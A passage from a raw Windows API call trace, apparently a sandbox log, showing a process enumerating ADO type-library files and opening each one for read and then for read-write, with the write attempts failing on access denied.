hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.125] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado21.tlb", cAlternateFileName="")) returned 1 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0088.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0088.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.126] AreFileApisANSI () returned 1 [0088.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", lpUsedDefaultChar=0x0) returned 53 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.127] AreFileApisANSI () returned 1 [0088.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0088.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 53 [0088.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.127] GetFileType (hFile=0x348) returned 0x1 [0088.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.127] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.127] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.128] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.128] CloseHandle (hObject=0x348) returned 1 [0088.128] AreFileApisANSI () returned 1 [0088.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0088.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 53 [0088.128] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.128] GetLastError () returned 0x5 [0088.128] GetLastError () returned 0x5 [0088.128] SetLastError (dwErrCode=0x5) [0088.128] GetLastError () returned 0x5 [0088.128] SetLastError (dwErrCode=0x5) [0088.128] GetLastError () returned 0x5 [0088.128] SetLastError (dwErrCode=0x5) [0088.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.129] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado25.tlb", cAlternateFileName="")) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0088.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.129] AreFileApisANSI () returned 1 [0088.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", lpUsedDefaultChar=0x0) returned 53 [0088.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.130] AreFileApisANSI () returned 1 [0088.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0088.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 53 [0088.130] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.132] GetFileType (hFile=0x348) returned 0x1 [0088.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.132] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.132] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.132] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.132] CloseHandle (hObject=0x348) returned 1 [0088.132] AreFileApisANSI () returned 1 [0088.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75eb8 [0088.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 53 [0088.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.133] GetLastError () returned 0x5 [0088.133] GetLastError () returned 0x5 [0088.133] SetLastError (dwErrCode=0x5) [0088.133] GetLastError () returned 0x5 [0088.133] SetLastError (dwErrCode=0x5) [0088.133] GetLastError () returned 0x5 [0088.133] SetLastError (dwErrCode=0x5) [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.133] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado26.tlb", cAlternateFileName="")) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0088.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0088.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0088.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.134] AreFileApisANSI () returned 1 [0088.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", lpUsedDefaultChar=0x0) returned 53 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.134] AreFileApisANSI () returned 1 [0088.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0088.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 53 [0088.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.135] GetFileType (hFile=0x348) returned 0x1 [0088.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.135] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.135] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.135] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.135] CloseHandle (hObject=0x348) returned 1 [0088.135] AreFileApisANSI () returned 1 [0088.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0088.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 53 [0088.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.136] GetLastError () returned 0x5 [0088.136] GetLastError () returned 0x5 [0088.136] SetLastError (dwErrCode=0x5) [0088.136] GetLastError () returned 0x5 [0088.136] SetLastError (dwErrCode=0x5) [0088.136] GetLastError () returned 0x5 [0088.136] SetLastError (dwErrCode=0x5) [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.136] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, 